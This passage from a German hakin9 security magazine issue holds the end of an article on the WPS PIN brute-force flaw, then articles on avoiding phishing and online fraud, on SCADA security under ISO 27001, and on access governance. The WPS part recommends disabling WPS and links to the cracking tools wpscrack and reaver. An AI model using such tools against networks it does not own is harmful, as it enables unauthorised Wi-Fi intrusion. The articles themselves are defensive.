root@discordia:~#
3/2012
Angriff ergreifen, herrscht verstärkter Aufklärungsbedarf.
Als Workaround empfiehlt sich die unverzügliche Abschaltung von WPS, insbesondere wenn sich WLANClients über die auf dem Router klebenden PIN konfigurieren lassen.
Als kleiner Lichtblick mag die Tatsache gelten, dass
Fritzboxen der Firma AVM – die in Deutschland weit
verbreitet sind – nicht von der Schwäche betroffen sind.
Eine öffentliche Tabelle verwundbarer Gerätschaften
findet sich im Übrigen bei Google Docs, wobei die Aufstellung bei Weiten nicht erschöpfend ist und regelmäßig erweitert wird.
Im Internet
•
•
•
•
•
•
•
•
•
•
https://sviehb.files.wordpress.com/2011/12/viehboeck_
wps.pdf - Dokumentation „Brute forcing Wi-Fi Protected
Setup” von Stefan Viehböck;
https://sviehb.wordpress.com - Weblog von Stefan Viehböck;
dl.dropbox.com/u/22108808/wpscrack.zip - wpscrack;
http://www.kb.cert.org/vuls/id/723755 - Vulnerability
Note VU#723755 vom US-CERT zur WiFi Protected Setup
(WPS) PIN brute force vulnerability;
http://www.tacnetsol.com/news/2011/12/28/cracking-wifi-protected-setup-with-reaver.html – Website von Tactical
Network Solutions zum Cracking von WiFi Protected
Setup mit Reaver;
http://www.devttys0.com/2011/12/cracking-wpa-in-10-hours-or-less - Eintrag von Craig Heffner im Weblog /dev/
ttyS0;
https://code.google.com/p/reaver-wps – reaver-wps;
https://code.google.com/p/reaver-wps/wiki/README - Wiki
von reaver;
https://docs.google.com/spreadsheet/ccc?key=0Ags-Jme
LMFP2dFp2dkhJZGIxTTFkdFpEUDNSSHZEN3c#gid=0 - Tabelle der WPS Flaw Vulnerable Devices bei Google Docs;
http://eprint.iacr.org/2007/120.pdf - Breaking 104 bit WEP
in less than 60 seconds.
Andreas G. Weyert
Der Autor ist IS-Revisor und zertifizierter BSI Auditteamleiter
für ISO 27001-Audits auf der Basis von IT-Grundschutz. Beim
weltumspannenden Logistik-Unternehmen Firma Hellmann
Worldwide Logistics entwickelt er als IT-Security-Manager
die Bereiche Informationssicherheit und Risk-Management.
Sein gemeinschaftlich mit Herrn Dr. Kraft verfasstes und in
der 2. Aufgabe vorliegendes Buch „Network Hacking“ hat
sich zu einem heimlichen Bestseller mit mehreren tausend
verkauften Exemplaren entwickelt.
Kontakt mit dem Autor unter andreas@weyert.de
hakin9.org/de
17
Sich vor Internetbetrug schützen
Sich vor Internetbetrug schützen
Sascha Sollnberger
Leider ist das Thema Cybercrime heute keine Ausnahme
mehr. Laut des Bundeskriminalamts sind im Jahr 2010
die registrierten Schäden im Internet im Vergleich zu 2009
um 66 Prozent gestiegen.
In diesem Artikel erfahren Sie…
Was Sie vorher wissen sollten…
• In diesem Artikel erfährt man Grundlageninformationen, wie
man sich sicher im Internet aufhält.
• Keine besonderen Vorkentnisse notwendig.
D
ie am meist genutzte Methode ist, den Kontakt
per Mail herzustellen. Eine beliebte Methode ist
dabei die berühmte Phishing-Mail. Hierbei wird
versucht, den User auf eine Internetseite zu locken,
die dem Original (z.B. die einer Bank) zum verwechseln ähnlich sieht. Hier wird versucht, hoch sensible Daten vom Surfer abzufragen. Das geschieht zum
Beispiel dadurch, dass eine gefälschte Anmeldeseite
erscheint, bei der man die Zugangsdaten wie Passwort, Kreditkartennummer oder auch die Bankverbindung eingeben soll. Diese “abgefischten” Daten der
getäuschten Surfer werden dann für den Betrüger in
einer Datenbank oder ähnlichem gesammelt der diese dann für seine kriminellen Machenschaften nutzen
kann.
Die meisten der Phishing-Mails richten keinen Schaden an, sondern sind darauf aus, die sensiblen Daten
der User zu erschleichen. Es gibt aber auch Ausnahmen. Denn manche dieser Mails können schon Schaden verursachen, ohne dass man seine Daten eingibt.
Schon durch das öffnen dieser Mail kann sich sogenannte Spyware auf dem Computer einnisten. Kurz
gesagt sind das Programme, die die Aktivitäten am eigenen Computer ausspähen. Diese können Passwörter oder andere persönliche Daten abspeichern indem
sie zum Beispiel die Tastatureingaben abspeichern
oder im Hintergrund die Festplatte abscannen.
Am besten kann man sich vor solchen Angriffen
schützen, indem man im Internet sein Hirn einschal-
hakin9.org/de
tet. Ihr lacht? Es ist aber wirklich so! Was ich meine ist,
dass man im Internet nicht auf alles klicken soll was einem beim surfen über den Weg läuft. Denn manchmal
verbirgt sich hinter dem einen oder anderen Link ein sogenannter Trojaner. Die ist eine Software, dass Betrüger ermöglicht durch eine “Hintertüre” Zugang zu einem
Computer zu bekommen und so private und sensible
Daten zu stehlen.
Beliebte Orte wo sich kriminelle oft rum treiben sind
Foren, Pornoseiten, soziale Netzwerke wie Facebook
oder Google Plus sowie Internetseite die Raubkopien
anbieten.
Auch versuche solche kriminelle Individuen ihr Glück
per Mail durch unrealistische Versprechungen. Die
meisten Surfer haben schon solche Mails wie “Steigern
Sie ihren Gewinn um 200 Prozent” oder “Sie haben
10000 Euro gewonnen”. Aber auch wenn man auf Jobsuche ist es gut mit offenen Augen durch das Netz zu
surfen. Es kommt oft genug vor, das durchaus seriöse
Internetseiten kopiert werden, um dann die ahnungslosen Surfer mit unberechtigten Anmeldegebühren in die
Falle zu locken. Bei solchen Mails oder Internetseiten
ist besonders Vorsicht geboten!
Jetzt wisst Ihr also, warum ich schrieb, dass man
sich am besten schützen kann, wenn man sein Hirneinschaltet und nicht wirklich auf alles klickt was einem
beim surfen über den Weg läuft.
Zusammenfassend noch ein paar Tipps um sich vor
Internetbetrug zu schützen:
19
• Nie ohne Firewall im Internet surfen. Dabei reicht
die von Windows mitgelieferte durchaus aus.
• Einen guten Virenscanner installieren und diesen in
regelmäßigen Abständen aktualisieren.
• Regelmäßige Backups des Computers die auf einem externen Speichermedium, wie zum Beispiel
eine USB-Festplatte, abspeichert werden sind
Pflicht.
• Misstrauen. Denn oft gemachte Angaben oder Versprechungen sind oft nur Lockangebote.
• Vorsicht bei Gratisangeboten oder Internetshop mit
extremst günstigen Preisen.
• Unerwartete Mail von unbekannten Absendern löschen und nicht öffnen. Erst Recht wenn diese
unbekannte Links enthalten oder Passwörter abfragen wollen.
• Keine zu leichten oder zu kurze Passwörter auswählen. Diese sollten immer Groß- und
Kleinbuchstaben so wie Sonderzeichen enthalten.
Passwörter gehören auch von Zeit zu Zeit gewechselt.
• Kontodaten oder Kreditkartendaten nur auf gesicherten (https) und seriöse Internetseiten eingeben.
• Auf die korrekte Internetadresse bei der Eingabe
achten. Sonst besteht die Möglichkeit, auf einer Fakeseite zu landen.
• Kreditkartenabrechnungen und Kontoauszüge immer regelmäßig kontrollieren um auffällige Geldabbuchungen so schnell wie möglich zu bemerken.
• Nur mit gesicherten WLAN-Verbindungen ins Internet gehen.
• Passwörter niemals im Browser abspeichern.
Sascha Sollnberger
Sascha Sollnberger ist IT-Systemintegrator. Er hat einen Blog:
http://www.dev0blog.de. Seine Themenschwerpunkte sind Internet, Linux, Opensource.
20
3/2012
INFORAMTIONSSICHERHEIT
Sicherheitsfalle Maschinenpark:
Anforderungen an Information Security Management steigen
Gerald Spiegel, Steria Mummert Consulting
Vernetztes Arbeiten im Business-Alltag geht längst über das
virtuelle Arbeiten mit mobilen Geräten und den Zugriff auf
Firmennetzwerke hinaus. Industrieunternehmen steuern
heute ganze Maschinen- und Anlagenparks sowie technische
Prozesse per Mausklick. Möglich wird das durch die Anbindung
so genannter SCADA-Systeme (Supervisory Control and Data
Acquisition) an die Unternehmens-IT.
In diesem Artikel erfahren Sie…
Was Sie vorher wissen sollten…
• wie anfällig SCADA-Steuerungssysteme für Schadsoftware
sind und welche Risiken sich dahinter verbergen. Darüber hinaus wird berichtet, wie groß der Handlungsdruck bei den
Unternehmen aktuell ist und an welchen Stellen sie ansetzen
können, um Sicherheitsvorkehrungen zu installieren.
• dass Industrieunternehmen heute ganze über SCADA-Systeme Maschinen- und Anlagenparks sowie technische Prozesse per Mausklick steuern und dadurch gleichzeitig neue
Angriffsflächen für Hacker entstehen.
D
adurch entstehen allerdings gleichzeitig neue
Angriffsflächen für Hacker. Unternehmen sind
gefordert, ihre Sicherheitsvorkehrungen auszudehnen. Ein Information Security Management System
(ISMS) auf Basis von ISO 27001 stellt dabei einen praxisbewährten Lösungsweg dar.
Die Anfälligkeit der Steuerungssysteme ist groß, weil
viele Unternehmen es anscheinend mit der Sicherheit
noch nicht so genau nehmen, wie mit den Computernetzen im Büro. Mindestens 10.000 der SCADA-Systeme
waren bis vor kurzem im Internet sichtbar, viele davon
sogar mit Log-in-Formular. Das hat ein Wissenschaftler
der Universität Cambridge herausgefunden. Etwa jedes
sechste der identifizierten SCADA-Systeme verlangte
nicht einmal eine Authentifizierung für Zugriffe.
Betroffen sind häufig Kraftwerke und Energieversorger. Prominentestes Beispiel ist der Computerwurm
Stuxnet. Die Schadsoftware nutzte 2010 eine SCADA-Lücke, um gezielt Kontrollsysteme des iranischen
Atomkraftwerks Buschehr anzugreifen. Allein im Iran
waren zu diesem Zeitpunkt mehr als 60.000 Hosts in
fast 35.000 Organisationen infiziert. Die Dramatik liegt
auf der Hand: Fallen beispielsweise Kraftwerke komplett aus, kommt es möglicherweise zu einem Domino-Effekt, der die Stromversorgung ganzer Landstriche
gefährdet. Verantwortlich dafür ist ein Selbstschutzmechanismus, der angeschlossene Kraftwerke selbständig vom Netz trennt, um Überspannungen zu verhin-
22
dern. So zwang der Computerwurm Lovsan bereits vor
acht Jahren 21 Stromerzeuger vom Netz zu gehen und
sorgte so für einen der größten Stromausfälle in der Geschichte der USA.
Handlungsdruck ist groß
SCADA ist Teil nahezu aller Prozessinfrastrukturen,
die physische Vorgänge abwickeln. Betroffen sind beispielsweise Stromerzeugung, Gas- und Wasserversorgung sowie die damit verbundene Netzsteuerung.
Hinzu kommt der Einsatz von SCADA-Systemen in
hochgradig vernetzten Umgebungen wie der Verkehrsleittechnik. Aus diesen Gründen stuft das Bundesamt
für Informationssicherheit SCADA-Systeme als kritische Informationsinfrastruktur ein, die besonderen
Schutzbedürfnissen unterliegen. Der Handlungsdruck
bei den Industriekonzernen, ihr Information Security
Management System auf den neusten Stand zu bringen, ist damit entsprechend groß.
Moderne Netzwerktechnik gegen
Einfallstore für Schadprogramme
Eine Schlüsselbaustelle für die Sicherheitsverantwortlichen ist, die SCADA-Systeme mit moderner Netzwerktechnik auszustatten. Grund hierfür ist die erforderliche
Fernwartung der verbundenen Anlagen. Updates und
Serviceleistungen lassen sich dadurch deutlich kostengünstiger erbringen. Mit der Nutzung standardisier-
3/2012
Sicherheitsfalle Maschinenpark: Anforderungen an Information Security Management steigen
ter Kommunikationsprotokolle wie Ethernet und TCP/IP
holen sich Unternehmen dieselben Sicherheitslücken
ins Haus, die auch Privatanwender vermeiden wollen,
indem sie Virenscanner und Firewalls installieren. Einige Stuxnet-Ableger verstecken sich zudem in gängigen
Word-Dokumenten oder gelangen über E-Mail-Anhänge in Unternehmensnetze.
Veraltete SCADA-Systeme ersetzen
Auf Seiten der Anlagenhersteller hat das Umdenken
zum Teil bereits eingesetzt. Maßgeblicher Treiber ist die
deutsche Nachfrage nach entsprechenden Produktlinien, die Firewalls und VPN-Lösungen für TCP/IP-basierte SCADA-Anbindungen bieten. Deutschland ist mit
einem Anteil von mehr als 25 Prozent größter Abnehmer auf dem europäischen SCADA-Markt. Prognosen
gehen davon aus, dass der Absatz in den kommenden
fünf Jahren auf ein Volumen von bis zu zwei Milliarden
US-Dollar ansteigt.
IT-Updates allein reichen nicht
Sich jedoch allein auf technische Weiterentwicklungen
bei künftigen SCADA-Systemen zu verlassen, funktioniert nicht. Dies hängt mit den verschiedenen Technologiezyklen von Office-IT und SCADA-Systemen zusammen. Industrieanlagen weisen Lebenszyklen zwischen
20 und 30 Jahren auf. Finanzielle Spielräume für technische Upgrades bestehen daher kaum. Hinzu kommt,
dass sich die Industrieleittechnik zu einer extrem heterogenen Systemlandschaft mit zahllosen Insellösungen
entwickelt hat. Gleichzeitig erschwert die große Ver-
fügbarkeitsanforderung an die Prozessleittechnik, üblicherweise 24 Stunden an 365 Tagen im Jahr, Technologieupgrades im laufenden Betrieb. Die Folge: Mit jeder
neu entdeckten Schwachstelle steigt die Verwundbarkeit der SCADA-Systeme weiter. Softwareupdates
schaffen ebenfalls kaum Entlastung, da es projektspezifische Machbarkeitsgrenzen gibt. Im Falle von Smart
Grid beispielsweise fehlen schlicht die Kapazitäten, um
Verschlüsselungsdienste oder Sicherheitssoftware auf
den Smart Metern zu betreiben. Darüber hinaus bestünde wegen des direkten physischen Zugriffs auf die
Geräte auch keine hinreichende Sicherheit – ganz im
Gegenteil.
Für klare Verantwortlichkeiten in punkto
Information Security Management sorgen
Eine weitere zentrale Aufgabe bei der Implementierung eines ISM-Systems (ISMS, siehe Abb. 1) ist die
Schaffung klarer Verantwortlichkeiten. Wichtig ist beispielsweise die Unterscheidung zwischen Security und Safety im Unternehmen. Üblich ist, dass sich
ein IT-Sicherheitsbeauftragter um die Informationssicherheit im Rahmen der Geschäftsprozesse kümmert.
Ein Sicherheitsingenieur sorgt dagegen für die Unfallsicherheit im Maschinenbetrieb . Doch genau an der
Schnittstelle zwischen Geschäfts-IT und Industrieleittechnik klafft häufig eine Verantwortungslücke. Damit steigt das Risiko, dass Sicherheitslücken nicht geschlossen werden, weil notwendige Anpassungen bei
Technik und Abläufen von keiner der beiden Seiten
eingeplant sind.
Abbildung 1. Einführungsmodell für ein Informationssicherheits-Management.
hakin9.org/de
23
INFORAMTIONSSICHERHEIT
Abbildung 2. PDCA-Zyklus bei der Implementierung von ISO 27001-konformen ISMS.
Für einen klar abgegrenzten Sicherheitsrahmen eignet sich der Sicherheitsstandard ISO 27001. Anders als
die IT-Grundschutzkataloge des Bundesamtes für Informationssicherheit (BSI) macht die ISO-Norm keine Annahmen über die vorhandenen IT-Umgebungen. Eine
umständliche Anpassung an die technischen Bedingungen von SCADA-Systemen entfällt damit. Der diesem
Modell zugrundeliegende Plan-Do-Check-Act-Zyklus
(PDCA, siehe Abb. 2) lässt sich entsprechend schnell
auf die technischen Prozesse von SCADA-Systemen
übertragen. So lassen sich Risiken für Cyber-Attacken
frühzeitig erkennen und Schutzmaßnahmen treffen.
Sicherheitsmaßnahmen,
die an der Quelle ansetzen
Gefragt sind darüber hinaus Sicherheitskonzepte für
sensible Technologie-Bereiche, bevor es zu einer Integration mit IT-Systemen aus Rechenzentren und Office-Umgebungen kommt. Dies gilt insbesondere für
spezielle SCADA-Software, die auf die gängigen Betriebssysteme Windows oder Unix (Linux) aufsetzt.
Da internetfähige Office-Rechner eine Vielzahl von
Schwachstellen aufweisen können, verwandelt sich der
Bürorechner quasi zu einem Tunnel für den Direktzugriff auf betriebskritische SCADA-Systeme.
Dabei muss es nicht einmal zu einem unmittelbaren
Eingriff in die Steuerungssysteme kommen. Es reicht
vollkommen aus, den Anwender beispielsweise durch
„Social Engineering„ mit manipulierten Fehlermeldungen und Korrekturanweisungen dazu zu bewegen, die
Systeme herunterzufahren. Ein anderer Weg ist das
ununterbrochene Absenden von Dienstanforderungen
an die SCADA-Software, um die Systeme durch Über-
24
lastung zum Stillstand zu bringen. Das Grundprinzip ist
dasselbe wie bei Internetservern, die unter der Last so
genannter Denial-of-Service-Attacken (DoS) einfach
zusammenbrechen. Auf diese Weise sind im Dezember
2010 die Webseiten von Mastercard und Visa unter Beschuss geraten. Auch SCADA-Systeme der Firma Wonderware waren bereits von DoS-Attacken betroffen.
Regierungsstellen und
Unternehmen sind gemeinsam gefordert
Auf staatlicher Seite sind die Verantwortlichen ebenfalls für das Thema sensibilisiert. Gegenmaßnahmen sind in Planung. Die Bundesregierung hat hierfür ein Konsortium aus europäischen Netzausrüstern
und Forschungseinrichtungen mit der Entwicklung eines speziellen Internet-Routers beauftragt. Unter dem
Codenamen SeSaM (Secure and Safe Microkernel)
fördert auch das Bundesforschungsministerium die
Herstellung entsprechender Sicherheitsmodule, um
sowohl Rechenzentren als auch Maschinensteuerungen vor Angriffen zu schützen. Zu welchem Zeitpunkt
diese Schutzhülle einsatzbereit ist und ob sie damit
tatsächlich sämtliche Sicherheitsaspekte abdeckt, ist
noch ungewiss.
Gerald Spiegel
Dr. Gerald Spiegel, Senior Manager Information Security Solutions bei Steria Mummert
Consulting, Frankfurt
gerald.spiegel@steria-mummert.de
3/2012
Wirksame Sicherheit durch Optimierung des Zugriffsschutzes
Wirksame Sicherheit durch Optimierung des Zugriffsschutzes
Access Governance – IAM der Neuzeit
Marco Rohrer, Experte IAM
Mehr Risiken erfordern höhere Sicherheiten für Informationen und Daten.
Aber wie? Die zunehmende Sensibilisierung der Sicherheitsverantwortlichen
führt dazu, dass sich diese verstärkt mit der Frage beschäftigen „wer
kann wie auf welche Informationen zugreifen?“ Damit der Zugriff auf die
Unternehmensressourcen sicher ist, sind unterschiedliche Themen für eine
umfassende Lösungsgestaltung möglich. Ein aktuelles und hoch wirksames
ist Access Governance und bedeutet eine strukturierte Kontrolle und
Überprüfung von Mitarbeiter-Berechtigungen.
In diesem Artikel erfahren Sie…
Was Sie vorher wissen sollten…
• Wie sich Access Governance an Ihre Sicherheitsbedürfnisse
anpassen lässt.
• Wie dank smarten Implementierungsmethoden die Risiken
schnell identifiziert und gemanagte werden; bei tieferen Kosten.
• Wie mit Access Governance IAM-Projekte aus Organisationsund Prozesssicht getrieben werden.
• Wie mit Access Governance die Fachbereiche im Umgang mit
Zugriffen und Sicherheit sensibilisiert werden.
• dass IAM wie das Herz von Sicherheit und Berechtigungen
funktioniert.
• dass IAM nur im Verbund Mensch, Technologie und Organisation wirksam ist.
• dass IAM dank neuen Methoden auch für KMU`s einsetzbar
wird.
• dass IAM nicht zwingend eine kostenintensive Systemintegration erfordert.
S
befugte Zugriffe sind heute so gross, dass die möglichen Folgekosten enorm sein können. Viel besser ist
es also, durch Präventionsmassnahmen die Sicherheitsstandards zu erhöhen. Zudem verlangen Compliance-Anforderungen, Risk- Management-Standards,
o wird Access Governance immer mehr zu einem „Muss“ für Unternehmen und Organisationen. Damit diese eine wirksame und umfassende Sicherheit für die Zugriffe erhalten, sind sie zum
Handeln gezwungen. Die Sicherheitsrisiken durch un-
Abbildung 1. Komponenten von Identity & Access Governance
hakin9.org/de
25
DATENSICHERHEIT
IKS und „Best-Practices“ umfassenderen Schutz für alle Zugriffsprozesse. Wir sprechen dann auch von „IAM
360-Grad“.
Detaillierte Gestaltungsmöglichkeiten:
• Zentrale, system- und plattformübergreifende Services für Identity Management zur Verwaltung von
Identitäten und Zugriffsrechten, welche in der Regel auf Rollen und Regeln basieren,
• automatisierte Antragsprozesse (Workflow) für das
Beantragen von Rechten und Rollen,
• Lösungen für Access Management zur Erhöhung
der Passwortsicherheit, z.B. mit Single Sign On,
• Lösungen für die Verwaltung der privilegierten
Usern und Accounts (oder User Accounts), damit auch die Administratoren-Tätigkeiten jederzeit
nachvollziehbar sind,
• zentrale Governance-Services zur Überprüfung der
Sicherheit, wie SoD-Prüfungen oder Access-ReZertifizierungen (Review einer Berechtigungsüberprüfung),
• Authentifizierungsservices für die eindeutige Authentisierung und Autorisierung der User.
Die „klassischen“ Technologien für das Identity Management sind auf die präventive Sicherheit und damit
primär auf das Erstellen und Verwalten von BenutzerKonten und Zugriffsrechten ausgerichtet. Lösungen für
die Access Governance bieten zusätzlich verschiedene Hilfsmittel für die „Echtzeitauswertung“. Damit lassen sich Abweichungen vom Soll-Zustand erkennen
und beispielsweise Funktionstrennungskonflikte ausweisen oder periodisch die Mitarbeiter-Zugriffe re-zertifizieren.
Die Ziele von Access Governance
Im klassischen Identity & Access Management standen
die effiziente User-Verwaltung und die Kostensenkung
im Vordergrund. Durch die wachsenden Sicherheitsrisiken spielen die Compliance-Faktoren eine zentrale Rolle. Mit den Systemen für die Access Governance erfüllen die Unternehmen nach und nach die zunehmenden
Anforderungen aus Regularien und Gesetzen und können somit die gesteigerten Erwartungen an das Risikomanagement erfüllen. Damit ist Access Governance
mehr als eine Erweiterung des traditionellen Identity &
Access Managements. Es ist auch nicht damit erledigt,
lediglich die aktuellen Berechtigungen einzusammeln
und periodisch zu attestieren. Eine Lösung für Access
Governance braucht zwar die regelmässigen Kontrollen, noch viel wichtiger sind jedoch Mechanismen zur
Erkennung und sofortigen Korrektur von Abweichungen
des Ist- vom Soll-Zustand. Damit dies effizient umgesetzt werden kann, braucht es eine Steuerung (oder ein
höheres Sicherheitsniveau in Form von Berechtigungen
durch Rollen und (Geschäfts-)Regeln).
Abbildung 2. Access Governance in Ergänzung zu Identity Management (Quelle: Crossideas)
26
3/2012
Wirksame Sicherheit durch Optimierung des Zugriffsschutzes
Mehr Verantwortung für die Fachbereiche
Auch die Access Governance baut auf Rollen, der
Kernkomponente des Identity Managements, auf. Der
Einsatz und Stellenwert von Rollen verändert sich jedoch. In den traditionellen Lösungen für Identity & Access Management stand der zentrale Administrationspunkt im Fokus und die Rollen hatten eine IT-lastige
Administrationsaufgabe zu erfüllen. Zwar wurden mit
den Rollen die Berechtigungen gekapselt und teilweise auch, auf Basis von HR-Informationen, automatisiert erstellt. Aber die Fachbereiche ausserhalb der
Informatik besassen kaum Kenntnisse über diese Rollen. Sie waren ein Hilfsmittel der Informatik, um die
stets wachsenden Administrationsvolumina bewältigen zu können. Die Berechtigungs- und Rollenzuweisung wurde in diesen traditionellen Systemen für das
Identity & Access Management primär mit den Daten
aus der Personalabteilung und den in der IT gebildeten Rollen gesteuert.
Neuere Systeme sind viel stärker durch die Geschäftsanforderungen getrieben. Regulatorische und
Compliance-Anforderungen verlangen, dass sich die
Fachbereiche stärker mit der Zugriffsthematik auseinandersetzen.
Die Rolle bekommt eine neue Rolle
Die Rollen, welche für die Access Governance benötigt werden, müssen stärker an die tatsächlichen Aufgaben der Mitarbeiter im Unternehmen angelehnt werden.
Die alleinige Koppelung von Rollen an HR-relevante
Informationen greift zu kurz. Zudem müssen die Rollen
verstärkt via ein Antrags- und Genehmigungsverfahren
zugewiesen werden. Eine rein system- und regelbasierende Zuweisung von Rollen ist unter dem Aspekt
der Access Governance zu unterlassen. Heutige Rollenmodelle müssen die „Unternehmenssicht“ abbilden.
Darin verbergen sich dann untergeordnet die zielsys-
temspezifischen Berechtigungsstrukturen. Heute wird
in grossen Organisationen zwischen Business- und ITRollen unterschieden. Damit lassen sich allzu komplexe Rollenhierarchien vermeiden. Dabei definieren die
IT-Rollen den technischen Bezug der zugewiesenen
Berechtigungen. Die Business-Rollen orientieren sich
an funktionalen, organisatorischen oder hierarchischen
Aspekten der Benutzer. So kann mit geeigneten Rollen
die Brücke zwischen Business und der Informatik gebaut werden.
Wichtig ist, dass bei der Erstellung von Rollen die
Fachbereiche den Lead übernehmen. Leider ist das
in der Praxis oft noch nicht der Fall. Die Fachbereiche
glauben häufig, dass sie für die Rollenbildung ungenügend qualifiziert sind und überlassen daher den Lead
lieber der IT. Das ist ein fataler Trugschluss. Die Rollenbildung muss zusammen mit den Fachbereichen
erfolgen. Daher müssen zwingend Wege gefunden
werden, um die Fachbereiche stärker in den Rollenbildungs- aber auch in den Rollenwartungs-Prozess
(Role-Lifecycle) einzubinden. Es bleibt immer in der
Fachbereichs- und Linien-Verantwortung, die Mitarbeiter mit den benötigten Rechten auszustatten und
dabei das „need-to-know-Prinzip“ bestmöglichst einzuhalten. Dabei gilt es für die Fachbereiche, die verlangte Verantwortung sowohl bei der Rollenerstellung
und -Wartung als auch bei der Zuweisung, Pflege und
Re-Zertifizierung der Berechtigungen und Rollen zu
übernehmen.
Access Intelligence
Die Access Intelligence liefert den Fachbereichen die
notwendigen Informationen, um die korrekten Entscheidungen im Hinblick auf die Kontrolle der erteilten Berechtigungen zu treffen.
Damit die Fachbereiche aus der Vielzahl an Zugriffsinformationen die richtigen Schlüsse ziehen und die
Abbildung 3. SoD auf Stufe Rollen (Quelle: Crossideas)
hakin9.org/de
27
DATENSICHERHEIT
Berechtigungen richtig vergeben resp. re-zertifizieren,
müssen die Daten vorgängig in eine Form gebracht
werden, die es den Entscheidungsträgern erlaubt, ihrer
Verantwortung nachzukommen. Die Risikobewertung,
die etablierte Berechtigungs- und Rollen-Re-Zertifizierung sowie die Funktionstrennung (Segregation of Duties, SoD) sind daher die wichtigsten Voraussetzungen
für die Fachbereiche, um die Berechtigungen der Mitarbeiter zu administrieren.
Rollen können, losgelöst von einzelnen Berechtigungen, hinsichtlich ihres Risikos bewertet werden. Weiter können Rollen einem Aktivitäts- oder Prozessmodell zugeordnet werden. Auf Ebene der Prozesse und
Aktivitäten lassen sich ebenfalls Risikobeurteilungen
vornehmen, z.B. nach deren Geschäftskritikalität oder
Sicherheitsrelevanz. Die Risikobewertung hilft bei der
Steuerung des Reportings/Controllings und hat Einfluss
darauf, wie oft eine Rolle bestätigt (re-zertifiziert) werden muss.
Segregation of Duties (SoD)
Wichtig für die Access Intelligence sind auch die Definitionen der Funktionstrennung (SoD). Es muss festgelegt werden, welche Funktionen und Arbeiten in Konflikt
mit anderen Aktivitäten stehen. Die SoD-Definitionen
können in Form von Policies auf die definierten Business-Rollen angewandt oder, je nach Lösung, direkt auf
Aktivitäten, Applikationen und damit auf Zugriffe vererbt
werden. Wenn die Funktionstrennung auf der Stufe von
Rollen (heute die gängige Praxis) definiert wird, gibt es
für die Modellgestaltung zwei grosse Herausforderungen:
• Minimierung der dem Mitarbeiter zugewiesenen
Rollen
• Definition und Anwendung der SoD für die Rollen
Die grosse Herausforderung besteht darin, dass die
Rollen nicht immer 1:1 auf die Business-Aktivitäten zugeschnitten sind. Daher ist es teilweise nicht klar, welche SoD-Policies auf eine Rolle angewandt werden
müssen. Noch schwieriger ist es, jederzeit die Rollen
auf gegenseitige Konflikte zu prüfen und die entsprechenden Policies zu unterhalten. Zudem ist dieser Ansatz im Administrations-Betrieb (der Pflege von Rollen
und SoD Polices) sehr intensiv.
Werden die Regeln (2) für die Funktionstrennung auf
der Ebene von Aktivitäten (1) gebildet, welche wieder-
Abbildung 3. SoD auf Stufe Rollen (Quelle: Crossideas)
28
3/2012
Wirksame Sicherheit durch Optimierung des Zugriffsschutzes
um Prozessen (1) zugeordnet sind, können diese losgelöst von der Aufbauorganisation stabiler definiert werden.
Die einzelnen Applikationen werden den Aktivitäten
zugewiesen (3). Damit ist auch definiert, welche Berechtigungen für welche Funktionen benötigt werden.
Sobald dieses Mapping erfolgt ist, kann die Kontrolle der Einhaltung der SoD-Regeln basierend auf den
Aktivitäten oder den Prozessen erfolgen. Dabei ist die
SoD Prüfung unabhängig von den Rollen, welche für
die Zuteilung der Berechtigungen angewendet wur-
CH-Winterthur, ipg AG (2001)
Als Experte für Identity & Access Management bietet ipg AG
Lösungen für den umfassenden Schutz von Benutzerdaten
und Zugriffsrechten an; dies für Unternehmen und Verwaltungen der gesamten Wirtschaft.
Der Beratungs- und Integrationsspezialist ist auf die Planung und Implementierung von Lösungen für die Verwaltung von Benutzerdaten und Zugriffsrechten spezialisiert.
Die langjährige Projekterfahrung garantiert ein umfassendes Verständnis für alle Themen rund um das Identity & Access Management.
Die Experten von ipg AG unterstützen in den Themen
„Role Based Access Control“, „Identity Management & Provisioning“, „Access Management and Single Sign On“, „Privileged Account Management” und „Identity & Access Management as a Service“.
ipg AG ist ein anerkannter IAM-Spezialist. Mit praxisorientierten Prozessen und fundiertem Informatik-Wissen
bauen die Experten Brücken zwischen Organisation und Informatik. Viele Kunden der gesamten Wirtschaft vertrauen auf die Funktion des Enablers ipg AG. Als bevorzugter
Umsetzungspartner für Software-Hersteller in der Marktregionen Schweiz, Deutschland und Österreich ist die ipg AG
in Winterthur, Hamburg und Wien ansässig. Das Aktienkapital ist im Besitze von Geschäftsleitung und Verwaltungsrat.
Informationen: www.ipg-ag.com, Marco Rohrer, CEO
den. Dadurch entsteht eine Entkoppelung von Rollen
und Regeln für die Funktionstrennung, welche die Lösung für eine „Access Governance“ agiler und flexibler
gestaltet.
Ungeachtet der Umsetzungsform: Im Zentrum steht
die Sicherstellung, dass gewisse Funktionen nicht
gleichzeitig von der selben Person wahrgenommen
werden dürfen oder zumindest dafür eine wissentliche
Attestierung (Genehmigung des Konflikts) durch das
Management erfolgt. Gerade bei Finanzdienstleistern
stellt die Gewährleistung der Funktionstrennung eine
zentrale Anforderung dar (als Beispiel: Kreditentscheid
und -Auszahlung soll durch verschiedene Person erfolgen).
Fazit: Lösungen für mehr
Sicherheit sind vorhanden
Das traditionelle IAM-Modell ist zwar nach wie vor
vertretbar. Um aber den Compliance-Anforderungen
auch Morgen noch zu entsprechen, muss dieses Modell unter dem Begriff der Access Governance stärker
auf das Thema Access Intelligence ausgerichtet werden. Darunter versteht sich die Bereitstellung geeigneter Massnahmen und Funktionalitäten für die Fachbereiche, damit diese in die Berechtigungsvergabe und
-Kontrolle einbezogen werden. Kernpunkt dabei ist es,
die vormals technischen Berechtigungsinformationen
in eine für das Business verständliche Form zu bringen.
Access Governance Lösungen bilden eine Plattform für die Fachbereiche, um deren Zugriffe zu steuern. Die IT übernimmt dabei keine Administrationstätigkeit mehr. Die Berechtigungsverwaltung wird durch
die Mitarbeiter selbst wahrgenommen. Damit dies
möglich ist, bieten diese Plattformen umfangreiche
Mitarbeiter-Self-Services Funktionalitäten und, ganz
zentral, Workflows für Antrags- und Genehmigungsprozesse.
Marco Rohrer, CEO ipg AG, Winterthur,
Deutschland, Österreich
Experte für Identity & Access Management
und Geschäftsleiter ipg AG. Rohrer macht
Beratungen und Expertisen zum Thema
Identity & Access Management sowie Strategie-Entwicklungen zur Umsetzung von
Projekten für Identity & Access Management und Organisationsentwicklungen für
den Aufbau von Rollenmanagement-Organisationen und -Prozessen. Als Mitgründer von ipg AG ist er
seit über zehn Jahren im Bereich Security, mit Spezialisierung
auf Identity und Access Management / Role Based Access Control, tätig.
hakin9.org/de
29
IT-RECHT
Das EuGH-Urteil – Google
Adwords sind rechtmäßig!
Felix Barth
